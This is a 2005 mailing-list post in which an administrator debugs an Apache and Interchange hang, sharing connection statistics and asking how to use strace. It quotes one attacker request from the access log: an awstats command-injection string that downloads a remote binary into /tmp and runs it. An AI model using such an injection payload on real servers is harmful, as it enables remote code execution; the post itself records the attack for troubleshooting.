[ic] mod_interchange and Apache MaxClients

John1 list_subscriber at yahoo.co.uk
Sun Nov 20 08:30:49 EST 2005 

Last night the website stopped responding at 03:55 in the morning when there 
was hardly any traffic to the website.  Ron's script successfully restarted 
Apache and Interchange and here is the output from the Alert e-mail:

############
Server process count and connections count before restarting Apache & 
Interchange.

Sun Nov 20 03:55:31 GMT 2005

16 connections to Apache port 80
0 connections to Apache port 443
24 Apache processes
7 IC processes
35 MySQL processes

Number of TCP and UDP connections for each IP, grouped by state
      3 our_website's_IP  CLOSE_WAIT
      3 our_website's_IP  FIN_WAIT2
    10 hackers_IP           CLOSE_WAIT

Number of active Unix domain sockets, grouped by state and path
      1 STREAM /usr/local/interchange/etc/socket.ipc
     10 DGRAM
     17 STREAM /usr/local/interchange/etc/socket
     23 STREAM /var/lib/mysql/mysql.sock
     96 STREAM
##############

The Apache access log shows just 3 entries before the site went down, all 
from hackers_IP.  For interest, these were along the lines of:

/cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget 
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|

where x.x.x.x and y.y.y.y were two remote IP addresses.  BTW, I don't have 
awstats installed, and resending the above request from my browser doesn't 
cause any problems - I just get the Interchange missing.html page as you 
would expect.

I have searched the interchange error log, the catalog error log and the 
apache error log and can find no evidence at all of any problem prior to the 
site going down, but it seems clear that this hacker must have sent 
something to Apache that caused Apache, mod_interchange or interchange to 
hang.

Notice from the above that hackers_IP had 10 connections to the server in 
the CLOSE_WAIT state just before Apache and Interchange were restarted by 
the script.  There were also another 6 connections where the foreign address 
was actually the same as local address i.e. both were the IP address of the 
website - I am not sure why localhost would have a connection open to 
itself - I am intrigued, but I am sure it is not relevant to the server 
going down.

So it seems to me we somehow need some more debugging information.  Racke 
mentioned using strace early on in this thread:

"First of all you should try to strace all the IC processes to see if it
does system calls and watch your logfiles (IC and system logfiles) as well.
If no system calls happened it might caught up in an infinite loop 
somewhere."

Can someone explain how I might use strace?  I won't be able to interpret 
the output myself but I am happy to post snippets in the hope that it may be 
useful to others in tracking down the problem.  Any other ideas on how to 
track down what may be bringing the site down? Thanks 


		
___________________________________________________________ 
WIN ONE OF THREE YAHOO! VESPAS - Enter now! - http://uk.cars.yahoo.com/features/competitions/vespa.html

More information about the interchange-users mailing list